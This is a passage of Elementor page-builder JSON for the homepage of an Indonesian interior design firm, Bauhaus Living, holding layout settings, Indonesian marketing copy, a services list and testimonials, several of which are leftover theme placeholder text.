pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic 